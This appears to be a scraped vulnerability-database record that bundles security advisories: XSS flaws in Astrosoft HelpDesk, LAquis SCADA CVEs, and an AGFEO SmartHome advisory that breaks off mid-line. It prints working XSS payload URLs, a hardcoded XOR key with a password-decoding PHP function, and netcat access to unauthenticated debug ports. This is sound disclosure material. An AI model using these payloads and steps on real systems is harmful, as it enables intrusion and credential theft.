Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:research@dsec.ru
{"id": "SECURITYVULNS:DOC:19004", "bulletinFamily": "software", "title": "[DSECRG-08-011] Astrosoft HelpDesk Multiple XSS", "description": "\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-08-011\r\n\r\n\r\nApplication: Astrosoft HelpDesk\r\nVersions Affected: \r\nVendor URL: http://astrosoft.ru/\r\nBugs: Multiple XSS Injections\r\nExploits: YES\r\nReported: 29.01.2008\r\nVendor response: NONE\r\nDate of Public Advisory: 04.02.2008\r\nAuthors: Alexandr Polyakov, Stas Svistunovich\r\n Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nAstrosoft HelpDesk system has multiple security vulnerabilities:\r\n\r\n1. Linked XSS\r\n2. Linked SiXSS\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\n1. Linked XSS vulnerability found in operator/article/article_search_results.asp, attacker can inject XSS in GET parameter "txtSearch"\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/operator/article/article_search_results.asp?txtSearch="></form><IMG SRC=javascript:alert('DSecRG XSS')>"\r\n\r\n--------------------------------------------------------------------------------------------\r\n\r\n\r\n2. SiXSS in URL\r\n\r\nVulnerability found in script operator/article/article_attachment.asp, attacker can inject XSS code in SQL Error.\r\n\r\nGET parameter "Attach_Id"\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/operator/article/article_attachment.asp?Attach_Id="<script>alert('DSecRG XSS')</script>\r\n\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.\r\n\r\n\r\nContact: research [at] dsec [dot] ru\r\n http://www.dsec.ru (in Russian)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n-- \r\n\r\n Digital Security Research Group mailto:research@dsec.ru", "published": "2008-02-05T00:00:00", "modified": "2008-02-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19004", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:24", "edition": 1, "viewCount": 43, "enchantments": {"score": {"value": 2.3, "vector": "NONE", "modified": "2018-08-31T11:10:24", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3023167", "KB2880833", "KB953334", "KB2874216", "KB3209587", "KB981401", "KB2788321", "KB2510690", "KB2785908", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34154", "1337DAY-ID-34158", "1337DAY-ID-34157"]}], "modified": "2018-08-31T11:10:24", "rev": 2}, "vulnersScore": 2.3}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:39", "description": "LCDS Laquis SCADA prior to version 4.1.0.4150 allows out of bounds read when opening a specially crafted project file, which may allow data exfiltration.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2019-02-01T18:29:00", "title": "CVE-2018-19004", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19004"], "modified": "2019-10-09T23:37:00", "cpe": [], "id": "CVE-2018-19004", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19004", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "zdi": [{"lastseen": "2020-06-22T11:40:43", "bulletinFamily": "info", "cvelist": ["CVE-2018-19004"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of LQS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the aq process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-01-19T00:00:00", "id": "ZDI-19-099", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-099/", "title": "LAquis SCADA LQS File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:53", "bulletinFamily": "info", "cvelist": ["CVE-2018-19004"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of LQS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the aq process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-01-19T00:00:00", "id": "ZDI-19-098", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-098/", "title": "LAquis SCADA LQS File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "ics": [{"lastseen": "2020-12-18T03:22:04", "bulletinFamily": "info", "cvelist": ["CVE-2018-19004", "CVE-2018-18986", "CVE-2018-18996", "CVE-2018-19002", "CVE-2018-18998", "CVE-2018-19000", "CVE-2018-19029", "CVE-2018-18992", "CVE-2018-18990", "CVE-2018-18988", "CVE-2018-18994"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.8**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** LCDS - Le\u00e3o Consultoria e Desenvolvimento de Sistemas Ltda ME\n * **Equipment:** LAquis SCADA\n * **Vulnerabilities:** Improper Input Validation, Out-of-Bounds Read, Code Injection, Untrusted Pointer Dereference, Out-of-Bounds Write, Relative Path Traversal, Injection, Use of Hard-Coded Credentials, Authentication Bypass Using an Alternate Path or Channel\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow remote code execution, data exfiltration, or cause a system crash.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of LAquis SCADA, an industrial automation software, are affected:\n\n * SCADA 4.1.0.3870\n\n### 3.2 VULNERABILITY OVERVIEW\n\n### 3.2.1 [ IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nOpening a specially crafted report format file allows execution of script code, which may allow remote code execution, data exfiltration, or cause a system crash.\n\n[CVE-2018-18988](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18988>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.2 [OUT-OF-BOUNDS READ CWE-125](<https://cwe.mitre.org/data/definitions/125.html>)\n\nOpening a specially crafted project file may cause an out of bounds read, which may allow data exfiltration.\n\n[CVE-2018-19004](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19004>) has been assigned to this vulnerability. A CVSS v3 base score of 3.3 has been calculated; the CVSS vector string is [(AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N>).\n\n### 3.2.3 [ IMPROPER CONTROL OF GENERATION OF CODE ('CODE INJECTION') CWE-94](<https://cwe.mitre.org/data/definitions/94.html>)\n\nOpening a specially crafted project file may cause improper control of generation of code, which may allow remote code execution, data exfiltration, or cause a system crash.\n\n[CVE-2018-19002](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19002>) has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is [(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H>).\n\n### 3.2.4 [UNTRUSTED POINTER DEREFERENCE CWE-822](<https://cwe.mitre.org/data/definitions/822.html>)\n\nAn attacker using a specially crafted project file can supply a pointer for a controlled memory address, which may allow remote code execution, data exfiltration, or cause a system crash.\n\n[CVE-2018-19029](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19029>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.5 [OUT-OF-BOUNDS WRITE CWE-787](<https://cwe.mitre.org/data/definitions/787.html>)\n\nOpening specially crafted report format file may cause an out of bounds read, which may cause a system crash, allow data exfiltration, or remote code execution.\n\n[CVE-2018-18986](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18986>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.6 [RELATIVE PATH TRAVERSAL CWE-23](<https://cwe.mitre.org/data/definitions/23.html>)\n\nThe issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information under the context of the web server process.\n\n[CVE-2018-18990](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18990>) has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>).\n\n### 3.2.7 [OUT-OF-BOUNDS READ CWE-125](<https://cwe.mitre.org/data/definitions/125.html>)\n\nOpening specially crafted project file may cause an out of bounds read, which may cause a system crash or allow data exfiltration.\n\n[CVE-2018-18994](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18994>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.8 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS IN OUTPUT USED BY A DOWNSTREAM COMPONENT ('INJECTION') CWE-74](<https://cwe.mitre.org/data/definitions/74.html>)\n\nTaking in user input without proper sanitation may allow an attacker to execute remote code on the server.\n\n[CVE-2018-18992](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18992>) has been assigned to this vulnerability. A CVSS v3 base score of 6.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L>).\n\n### 3.2.9 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS IN OUTPUT USED BY A DOWNSTREAM COMPONENT ('INJECTION') CWE-74](<https://cwe.mitre.org/data/definitions/74.html>)\n\nTaking in user input without proper authorization or sanitation may allow an attacker to execute remote code on the server.\n\n[CVE-2018-18996](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18996>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.10 [USE OF HARD-CODED CREDENTIALS CWE-798](<https://cwe.mitre.org/data/definitions/798.html>)\n\nUse of hard coded credentials may allow an attacker unauthorized access to the system with high-privileges.\n\n[CVE-2018-18998](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18998>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.11 [AUTHENTICATION BYPASS USING AN ALTERNATE PATH OR CHANNEL CWE-288](<https://cwe.mitre.org/data/definitions/288.html>)\n\nAn authentication bypass is possible, which may allow an attacker access to sensitive data.\n\n[CVE-2018-19000](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19000>) has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Chemical, Commercial Facilities, Energy, Food and Agriculture, Transportation Systems, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED:** South America\n * **COMPANY HEADQUARTERS LOCATION:** Brazil\n\n### 3.4 RESEARCHER\n\nEsteban Ruiz (mr me) working with Zero Day Initiative reported these vulnerabilities to NCCIC.\n\n## 4\\. MITIGATIONS\n\nLCDS recommends users update to Version 4.1.0.4150 which can be found at the following location:\n\n[https://laquisscada.com](<https://laquisscada.com/>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNCCIC also recommends that users take the following measures to protect themselves from social engineering attacks: \n\n * Do not click web links or open unsolicited attachments in email messages. \n * Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. \n * Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-19-015-01>); we'd welcome your feedback.\n", "edition": 13, "modified": "2019-01-15T00:00:00", "published": "2019-01-15T00:00:00", "id": "ICSA-19-015-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-19-015-01", "title": "LCDS - Le\u00e3o Consultoria e Desenvolvimento de Sistemas Ltda ME LAquis SCADA", "type": "ics", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "seebug": [{"lastseen": "2018-06-08T07:13:03", "description": "### Vendor description:\r\nAGFEO GmbH & Co. KG is a vendor of telephone systems and other (tele-)communication products like DECT phones, headsets or smart home products as well.\r\n\r\n\r\n### Business recommendation:\r\n\r\nThe available patches should be installed immediately.\r\n\r\nSEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals as there are indications for further security issues.\r\n\r\n\r\n### Vulnerability overview/description:\r\n\r\n1) Unauthenticated access to web services and authentication bypass\r\n\r\nA web service with multiple scripts for debug purposes is accessible on an unusual port on the device. There is also a script to read files from the filesystem. As the web service runs with root privileges all files on the operating system can be read by an attacker. This only affects the ES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx.\r\n\r\nThe configuration of the device can be changed and arbitrary updates can be uploaded as well as music files for the answering machine. By reading the database content, the usernames and their passwords can be revealed and easily\r\ndecrypted. This way the administrator password can be dumped from the database and the device can be fully administrated by an attacker. The normal user interface has an additional development subfolder which was probably used during the development process. Updates can be triggered from this sub platform and log files, statistics and states can also be displayed.\r\n\r\n\r\n2) Unauthenticated access to configuration ports\r\n\r\nMultiple different instances of TCP services are present on the device. Each of the listening sockets is forked from a debug and configuration service. Internal device information can be read from the device. Among other commands, the configuration of the device can also be altered by using these services.\r\n\r\n\r\n3) Hardcoded cryptographic keys\r\n\r\nThree certificates including their private keys are embedded in the firmware of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both product lines are exactly the same. One certificate is used for HTTPS\r\n(default server certificate for web based configuration and management).\r\n\r\nImpersonation, man-in-the-middle or passive decryption attacks are possible. These attacks allow an attacker to gain access to sensitive information like admin credentials and use them in further attacks.\r\n\r\n\r\n4) Multiple reflected cross site scripting (XSS) vulnerabilities\r\n\r\nThe ES 5xx SmartHome products are vulnerable to reflected cross site scripting. Malicious JavaScript code can be executed in the browser of a victim by luring to a handcrafted link. This is possible even if the victim is not logged in. It is assumed that the 6xx products are affected as well but those could not be tested.\r\n\r\n\r\n### Proof of concept:\r\n\r\n1) Unauthenticated access to web services and authentication bypass \r\n\r\nThe debug web service is available by using the following url:\r\n```\r\nhttp://<Device-IP>:20011/index.html\r\n```\r\nThere are different scripts accessible, the following actions can be executed:\r\n * -) Change IP configuration\r\n * -) Change time zone\r\n * -) Upload updates (Any files can be uploaded to the device!)\r\n * -) Read all files on the filesystem\r\n * -) Play, delete and move voice messages on all mail boxes\r\n * -) Converting mp3 files to wav files\r\n * -) List all connected phones and the related numbers\r\n\r\nThe SQLite database is located under \"/home/profile/poolstore.db\". By reading this file the usernames and passwords can be dumped. The passwords are encoded with base64 and encrypted with XOR. To decrypt the XOR'ed password the following key has to be used:\r\n```\r\n \"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba\"\r\n```\r\n\r\nThe function to decrypt the password was found in the php script \"login.php\":\r\n```\r\nfunction decodePassword($PasswordEnc)\r\n{\r\n $PasswordBinaryEncBase64 = \"\";\r\n $PasswordBinaryEnc=\"\";\r\n $PasswordBinary = array();\r\n $Password = \"\";\r\n $lastChar=0;\r\n\r\n $Key=array(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba);\r\n\r\n $PasswordBinaryEncBase64 = $PasswordEnc;\r\n\r\n // base64 decode\r\n $PasswordBinaryEnc = base64_decode($PasswordBinaryEncBase64);\r\n\r\n // xor decode\r\n for($i=0; $i<strlen($PasswordBinaryEnc); $i++) {\r\n $PasswordBinary[$i] = ord($PasswordBinaryEnc[$i]) ^ $Key[$i % count($Key)]\r\n^ $lastChar;\r\n $lastChar = ord($PasswordBinaryEnc[$i]);\r\n }\r\n\r\n // erstes Zeichen entfernen (random char!)\r\n foreach ($PasswordBinary as $chr) {\r\n $Password .= chr($chr);\r\n }\r\n $Password = substr($Password, 1);\r\n // printf(\"%s:%d Password %s\\n\", __FUNCTION__, __LINE__, $Password);\r\n return $Password;\r\n}\r\n```\r\n\r\nAn additional subfolder, which contains debug scripts, is available under the following location:\r\n```\r\nhttp://<Device-IP>/shdev/ui9.php\r\n```\r\n\r\nUpdates can be triggered, logs can be shown and status messages can be gathered within this functionality. Furthermore, it is possible to debug the login process. Since there is a hardcoded user \"admin\" a brute force attack is also possible.\r\n\r\n\r\n2) Unauthenticated access to configuration ports \r\n\r\nThe following TCP ports can be accessed with \"nc <Device-IP> -p <Port>\": 19002, 19004, 19006, 19009, 19010, 19080, 19081 By connecting to one of these ports a debug interface spawns. For example the connection to port 19081:\r\n```\r\n$ nc 192.168.0.40 19081\r\nStart Menue: <Return>\r\n========< UPDS - Menue >========\r\ns: show state\r\nh: help\r\nD: DEBmod on\r\nd: DEBmod off\r\nL: LOG on\r\nl: LOG off\r\nS: SERVICE-SUBMENUE\r\nq: Quit telnet session\r\n========= NOT AKTIV ===========\r\ns\r\nstatus ausgeben (noch nicht vollstaendig implementiert)\r\nupds <Timestamp> bState: 